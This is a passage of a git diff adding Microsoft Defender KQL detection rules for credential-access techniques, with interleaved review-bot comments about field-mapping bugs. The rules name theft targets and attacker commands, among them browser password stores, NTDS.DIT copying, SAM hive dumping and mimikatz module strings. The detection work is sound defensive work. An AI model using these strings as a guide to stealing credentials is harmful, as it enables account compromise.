+| where (ProcessCommandLine contains "shadow" and ProcessCommandLine contains "create") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql b/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql
new file mode 100644
index 00000000..77f36c3a
--- /dev/null
+++ b/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql
@@ -0,0 +1,10 @@
+// Title: SQLite Chromium Profile Data DB Access
+// Author: TropChaud
+// Date: 2022-12-19
+// Level: high
+// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql b/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql
new file mode 100644
index 00000000..0bbedf19
--- /dev/null
+++ b/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql
@@ -0,0 +1,10 @@
+// Title: SQLite Firefox Profile Data DB Access
+// Author: frack113
+// Date: 2022-04-08
+// Level: high
+// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1539, attack.collection, attack.t1005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql
new file mode 100644
index 00000000..1a903487
--- /dev/null
+++ b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql
@@ -0,0 +1,17 @@
+// Title: Suspicious File Access to Browser Credential Storage
+// Author: frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore
+// Date: 2025-05-22
+// Level: low
+// Description: Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.
+Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.
+This behavior is often commonly observed in credential stealing malware.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.003, attack.discovery, attack.t1217
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Legitimate software accessing browser data for synchronization or backup purposes.
+// - Legitimate software installed on partitions other than "C:\"
+
+DeviceFileEvents
+| where ((FileName contains "\\Sputnik\\Sputnik" or FileName contains "\\MapleStudio\\ChromePlus" or FileName contains "\\QIP Surf" or FileName contains "\\BlackHawk" or FileName contains "\\7Star\\7Star" or FileName contains "\\CatalinaGroup\\Citrio" or FileName contains "\\Google\\Chrome" or FileName contains "\\Coowon\\Coowon" or FileName contains "\\CocCoc\\Browser" or FileName contains "\\uCozMedia\\Uran" or FileName contains "\\Tencent\\QQBrowser" or FileName contains "\\Orbitum" or FileName contains "\\Slimjet" or FileName contains "\\Iridium" or FileName contains "\\Vivaldi" or FileName contains "\\Chromium" or FileName contains "\\GhostBrowser" or FileName contains "\\CentBrowser" or FileName contains "\\Xvast" or FileName contains "\\Chedot" or FileName contains "\\SuperBird" or FileName contains "\\360Browser\\Browser" or FileName contains "\\360Chrome\\Chrome" or FileName contains "\\Comodo\\Dragon" or FileName contains "\\BraveSoftware\\Brave-Browser" or FileName contains "\\Torch" or FileName contains 
"\\UCBrowser\\" or FileName contains "\\Blisk" or FileName contains "\\Epic Privacy Browser" or FileName contains "\\Nichrome" or FileName contains "\\Amigo" or FileName contains "\\Kometa" or FileName contains "\\Xpom" or FileName contains "\\Microsoft\\Edge" or FileName contains "\\Liebao7Default\\EncryptedStorage" or FileName contains "\\AVAST Software\\Browser" or FileName contains "\\Kinza" or FileName contains "\\Mozilla\\SeaMonkey\\" or FileName contains "\\Comodo\\IceDragon\\" or FileName contains "\\8pecxstudios\\Cyberfox\\" or FileName contains "\\FlashPeak\\SlimBrowser\\" or FileName contains "\\Moonchild Productions\\Pale Moon\\") and (FileName contains "\\Profiles\\" or FileName contains "\\User Data") and ((FileName contains "\\Login Data" or FileName contains "\\Cookies" or FileName contains "\\EncryptedStorage" or FileName contains "\\WebCache\\") or (FileName endswith "cert9.db" or FileName endswith "cookies.sqlite" or FileName endswith "formhistory.sqlite" or FileName endswith "key3.db" or FileName endswith "key4.db" or FileName endswith "Login Data.sqlite" or FileName endswith "logins.json" or FileName endswith "places.sqlite"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or (InitiatingProcessFolderPath endswith "\\Sputnik.exe" or InitiatingProcessFolderPath endswith "\\ChromePlus.exe" or InitiatingProcessFolderPath endswith "\\QIP Surf.exe" or InitiatingProcessFolderPath endswith "\\BlackHawk.exe" or InitiatingProcessFolderPath endswith "\\7Star.exe" or InitiatingProcessFolderPath endswith "\\Sleipnir5.exe" or InitiatingProcessFolderPath endswith "\\Citrio.exe" or InitiatingProcessFolderPath endswith "\\Chrome SxS.exe" or InitiatingProcessFolderPath endswith "\\Chrome.exe" or InitiatingProcessFolderPath endswith 
"\\Coowon.exe" or InitiatingProcessFolderPath endswith "\\CocCocBrowser.exe" or InitiatingProcessFolderPath endswith "\\Uran.exe" or InitiatingProcessFolderPath endswith "\\QQBrowser.exe" or InitiatingProcessFolderPath endswith "\\Orbitum.exe" or InitiatingProcessFolderPath endswith "\\Slimjet.exe" or InitiatingProcessFolderPath endswith "\\Iridium.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Chromium.exe" or InitiatingProcessFolderPath endswith "\\GhostBrowser.exe" or InitiatingProcessFolderPath endswith "\\CentBrowser.exe" or InitiatingProcessFolderPath endswith "\\Xvast.exe" or InitiatingProcessFolderPath endswith "\\Chedot.exe" or InitiatingProcessFolderPath endswith "\\SuperBird.exe" or InitiatingProcessFolderPath endswith "\\360Browser.exe" or InitiatingProcessFolderPath endswith "\\360Chrome.exe" or InitiatingProcessFolderPath endswith "\\dragon.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\torch.exe" or InitiatingProcessFolderPath endswith "\\UCBrowser.exe" or InitiatingProcessFolderPath endswith "\\BliskBrowser.exe" or InitiatingProcessFolderPath endswith "\\Epic Privacy Browser.exe" or InitiatingProcessFolderPath endswith "\\nichrome.exe" or InitiatingProcessFolderPath endswith "\\AmigoBrowser.exe" or InitiatingProcessFolderPath endswith "\\KometaBrowser.exe" or InitiatingProcessFolderPath endswith "\\XpomBrowser.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\LiebaoBrowser.exe" or InitiatingProcessFolderPath endswith "\\AvastBrowser.exe" or InitiatingProcessFolderPath endswith "\\Kinza.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\icedragon.exe" or InitiatingProcessFolderPath endswith "\\cyberfox.exe" or InitiatingProcessFolderPath endswith "\\SlimBrowser.exe" or InitiatingProcessFolderPath endswith "\\palemoon.exe") or 
(InitiatingProcessFolderPath contains "\\Sputnik\\" or InitiatingProcessFolderPath contains "\\MapleStudio\\" or InitiatingProcessFolderPath contains "\\QIP Surf\\" or InitiatingProcessFolderPath contains "\\BlackHawk\\" or InitiatingProcessFolderPath contains "\\7Star\\" or InitiatingProcessFolderPath contains "\\Fenrir Inc\\" or InitiatingProcessFolderPath contains "\\CatalinaGroup\\" or InitiatingProcessFolderPath contains "\\Google\\" or InitiatingProcessFolderPath contains "\\Coowon\\" or InitiatingProcessFolderPath contains "\\CocCoc\\" or InitiatingProcessFolderPath contains "\\uCozMedia\\" or InitiatingProcessFolderPath contains "\\Tencent\\" or InitiatingProcessFolderPath contains "\\Orbitum\\" or InitiatingProcessFolderPath contains "\\Slimjet\\" or InitiatingProcessFolderPath contains "\\Iridium\\" or InitiatingProcessFolderPath contains "\\Vivaldi\\" or InitiatingProcessFolderPath contains "\\Chromium\\" or InitiatingProcessFolderPath contains "\\GhostBrowser\\" or InitiatingProcessFolderPath contains "\\CentBrowser\\" or InitiatingProcessFolderPath contains "\\Xvast\\" or InitiatingProcessFolderPath contains "\\Chedot\\" or InitiatingProcessFolderPath contains "\\SuperBird\\" or InitiatingProcessFolderPath contains "\\360Browser\\" or InitiatingProcessFolderPath contains "\\360Chrome\\" or InitiatingProcessFolderPath contains "\\Comodo\\" or InitiatingProcessFolderPath contains "\\BraveSoftware\\" or InitiatingProcessFolderPath contains "\\Torch\\" or InitiatingProcessFolderPath contains "\\UCBrowser\\" or InitiatingProcessFolderPath contains "\\Blisk\\" or InitiatingProcessFolderPath contains "\\Epic Privacy Browser\\" or InitiatingProcessFolderPath contains "\\Nichrome\\" or InitiatingProcessFolderPath contains "\\Amigo\\" or InitiatingProcessFolderPath contains "\\Kometa\\" or InitiatingProcessFolderPath contains "\\Xpom\\" or InitiatingProcessFolderPath contains "\\Microsoft\\" or InitiatingProcessFolderPath contains "\\Liebao7\\" or 
InitiatingProcessFolderPath contains "\\AVAST Software\\" or InitiatingProcessFolderPath contains "\\Kinza\\" or InitiatingProcessFolderPath contains "\\Mozilla\\" or InitiatingProcessFolderPath contains "\\8pecxstudios\\" or InitiatingProcessFolderPath contains "\\FlashPeak\\" or InitiatingProcessFolderPath contains "\\Moonchild Productions\\") or (InitiatingProcessFolderPath =~ "System" and InitiatingProcessParentFileName =~ "Idle")))) and (not(((InitiatingProcessFolderPath contains "\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or InitiatingProcessParentFileName =~ "msiexec.exe" or InitiatingProcessFolderPath endswith "\\everything.exe" or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_history_file_operations.kql b/KQL/rules/Credential Access/suspicious_history_file_operations.kql
new file mode 100644
index 00000000..73d5d226
--- /dev/null
+++ b/KQL/rules/Credential Access/suspicious_history_file_operations.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious History File Operations
+// Author: Mikhail Larin, oscd.community
+// Date: 2020-10-17
+// Level: medium
+// Description: Detects commandline operations on shell history files
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.003
+// False Positives:
+// - Legitimate administrative activity
+// - Legitimate software, cleaning hist file
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".bash_history" or ProcessCommandLine contains ".zsh_history" or ProcessCommandLine contains ".zhistory" or ProcessCommandLine contains ".history" or ProcessCommandLine contains ".sh_history" or ProcessCommandLine contains "fish_history"
\ No newline at end of file
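Review bot: Every path test in the first three filter groups of suspicious_file_access_to_browser_credential_storage.kql is written against `FileName` (`FileName contains "\\Google\\Chrome"`, `FileName contains "\\Profiles\\"`, `FileName contains "\\Login Data"`), but in DeviceFileEvents that column carries only the leaf file name, so a pattern containing a backslash can never match and, because the groups are AND-ed, the whole rule is dead; only the `FileName endswith "cookies.sqlite"`-style terms are able to fire. The full path is in `FolderPath`, which is what werfault_lsass_process_memory_dump.kql in this same commit uses against the same table, so the directory-bearing terms should read `FolderPath contains "\\Google\\Chrome"` and likewise for the rest. Since the file is generated, the fix belongs in the converter's field mapping for file-access rules rather than in this output. The hunk's query begins several physical lines above this one.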
diff --git a/KQL/rules/Credential Access/suspicious_key_manager_access.kql b/KQL/rules/Credential Access/suspicious_key_manager_access.kql
new file mode 100644
index 00000000..7d436e24
--- /dev/null
+++ b/KQL/rules/Credential Access/suspicious_key_manager_access.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Key Manager Access
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-21
+// Level: high
+// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "keymgr" and ProcessCommandLine contains "KRShowKeyMgr") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql b/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql
new file mode 100644
index 00000000..565ac3f8
--- /dev/null
+++ b/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Process Patterns NTDS.DIT Exfil
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-11
+// Level: high
+// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "ac i ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "/c copy " and ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") or (ProcessCommandLine contains "activate instance ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "ntds.dit") or ((FolderPath endswith "\\NTDSDump.exe" or FolderPath endswith "\\NTDSDumpEx.exe") or (ProcessCommandLine contains "ntds.dit" and ProcessCommandLine contains "system.hiv") or ProcessCommandLine contains "NTDSgrab.ps1")) or (((InitiatingProcessFolderPath contains "\\apache" or InitiatingProcessFolderPath contains "\\tomcat" or InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\") or (FolderPath contains "\\apache" or FolderPath contains "\\tomcat" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Public\\" or FolderPath contains "\\PerfLogs\\")) and ProcessCommandLine contains "ntds.dit")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql b/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql
new file mode 100644
index 00000000..b4a69993
--- /dev/null
+++ b/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Reg Add Open Command
+// Author: frack113
+// Date: 2021-12-20
+// Level: medium
+// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/ve " and ProcessCommandLine contains "/d") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "DelegateExecute") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql b/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql
new file mode 100644
index 00000000..f7bbaceb
--- /dev/null
+++ b/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Serv-U Process Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-14
+// Level: high
+// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555, cve.2021-35211
+// False Positives:
+// - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe") and InitiatingProcessFolderPath endswith "\\Serv-U.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql b/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql
new file mode 100644
index 00000000..f532a1dd
--- /dev/null
+++ b/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious SYSTEM User Process Creation
+// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
+// Date: 2021-12-20
+// Level: high
+// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.privilege-escalation, attack.t1134, attack.t1003, attack.t1027
+// False Positives:
+// - Administrative activity
+// - Scripts and administrative tools used in the monitored environment
+// - Monitoring activity
+
+DeviceProcessEvents
+| where (((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\wscript.exe") or ProcessCommandLine matches regex "net\\s+user\\s+" or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine 
contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump"))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or (ProcessCommandLine contains "ping" and ProcessCommandLine contains "127.0.0.1" and ProcessCommandLine contains " -n ") or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd"))))
\ No newline at end of file
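Review bot: The account gate at the top of the where clause, `AccountName contains "AUTHORI" or AccountName contains "AUTORI"`, is looking for the authority part of the account, but DeviceProcessEvents splits that off into `AccountDomain` (the SYSTEM account is normally reported as domain `nt authority`, name `system`), so the substring is being searched in the wrong column and, because it is AND-ed with the integrity-level test, the rule is unlikely to fire at all. If the converter maps the upstream user field straight onto `AccountName`, the gate should at least also consult the domain column, `(AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI" or AccountName contains "AUTHORI" or AccountName contains "AUTORI")`. Worth verifying against a live SYSTEM process event before changing the mapping. The query begins on the previous physical line.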
diff --git a/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql b/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql
new file mode 100644
index 00000000..a5a219a1
--- /dev/null
+++ b/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious SYSVOL Domain Group Policy Access
+// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-04-09
+// Level: medium
+// Description: Detects Access to Domain Group Policies stored in SYSVOL
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\SYSVOL\\" and ProcessCommandLine contains "\\policies\\"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql b/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql
new file mode 100644
index 00000000..b745ddf8
--- /dev/null
+++ b/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Teams Application Related ObjectAcess Event
+// Author: @SerkinValery
+// Date: 2022-09-16
+// Level: high
+// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Microsoft\\Teams\\Cookies" or RegistryKey contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
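Review bot: The Teams rule is emitted against `DeviceRegistryEvents` with `RegistryKey contains "\\Microsoft\\Teams\\Cookies"` and `"\\Microsoft\\Teams\\Local Storage\\leveldb"`, but those strings are file-system paths under the Teams profile directory, not registry keys, so nothing in that table can ever match them. The same table mix-up appears in wce_wceaux_dll_access.kql two hunks down, where `RegistryKey endswith "\\wceaux.dll"` is looking for a DLL path. Both should be generated against `DeviceFileEvents` with `FolderPath contains "\\Microsoft\\Teams\\Cookies"` and `FolderPath endswith "\\wceaux.dll"`, as werfault_lsass_process_memory_dump.kql in this commit does for the same kind of object; the `InitiatingProcessFolderPath` exclusion carries over unchanged. The object-access event source is most likely being mapped to the registry table in the converter, so the fix belongs there; windows_credential_editor_registry.kql (`Services\\WCESERVICE\\Start`) is a genuine registry key and is correct as written.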
diff --git a/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
new file mode 100644
index 00000000..5a63271a
--- /dev/null
+++ b/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-14
+// Level: medium
+// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+// - Legitimate usage to restore snapshots
+// - Legitimate admin activity
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "snapshot" and ProcessCommandLine contains "mount ") or (ProcessCommandLine contains "ac" and ProcessCommandLine contains " i" and ProcessCommandLine contains " ntds")) and (FolderPath endswith "\\ntdsutil.exe" or ProcessVersionInfoOriginalFileName =~ "ntdsutil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql b/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql
new file mode 100644
index 00000000..0f3e9379
--- /dev/null
+++ b/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql
@@ -0,0 +1,12 @@
+// Title: VolumeShadowCopy Symlink Creation Via Mklink
+// Author: Teymur Kheirkhabarov, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Shadow Copies storage symbolic link creation using operating systems utilities
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003
+// False Positives:
+// - Legitimate administrator working with shadow copies, access for backup purposes
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "mklink" and ProcessCommandLine contains "HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/wce_wceaux_dll_access.kql b/KQL/rules/Credential Access/wce_wceaux_dll_access.kql
new file mode 100644
index 00000000..a0776d36
--- /dev/null
+++ b/KQL/rules/Credential Access/wce_wceaux_dll_access.kql
@@ -0,0 +1,10 @@
+// Title: WCE wceaux.dll Access
+// Author: Thomas Patzke
+// Date: 2017-06-14
+// Level: critical
+// Description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.s0005
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\wceaux.dll"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql b/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql
new file mode 100644
index 00000000..00e03537
--- /dev/null
+++ b/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql
@@ -0,0 +1,10 @@
+// Title: WerFault LSASS Process Memory Dump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-27
+// Level: high
+// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\WerFault.exe" and (FolderPath contains "\\lsass" or FolderPath contains "lsass.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/windows_credential_editor_registry.kql b/KQL/rules/Credential Access/windows_credential_editor_registry.kql
new file mode 100644
index 00000000..394f6e39
--- /dev/null
+++ b/KQL/rules/Credential Access/windows_credential_editor_registry.kql
@@ -0,0 +1,10 @@
+// Title: Windows Credential Editor Registry
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-12-31
+// Level: critical
+// Description: Detects the use of Windows Credential Editor (WCE)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, attack.s0005
+
+DeviceRegistryEvents
+| where RegistryKey contains "Services\\WCESERVICE\\Start"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql b/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql
new file mode 100644
index 00000000..86a64afd
--- /dev/null
+++ b/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql
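Review bot: The WerFault query filters `DeviceFileEvents` on paths only, so it also fires on modify, rename and delete events for the same path although the description is about a dump file being created; add `and ActionType == "FileCreated"` to the `where`. The .RDP File Created By Uncommon Application hunk further down has the same gap, and the ADS Zone.Identifier Deleted By Uncommon Application hunk matches every file event on `:Zone.Identifier` even though its title and description are specifically about deletion, where `ActionType == "FileDeleted"` is the intended filter. The converter appears to drop the Sigma file category (file_event / file_delete) when it maps to `DeviceFileEvents`; mapping it onto `ActionType` would fix all three and keep the stated severities meaningful.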
@@ -0,0 +1,10 @@
+// Title: Windows Credential Manager Access via VaultCmd
+// Author: frack113
+// Date: 2022-04-08
+// Level: medium
+// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceProcessEvents
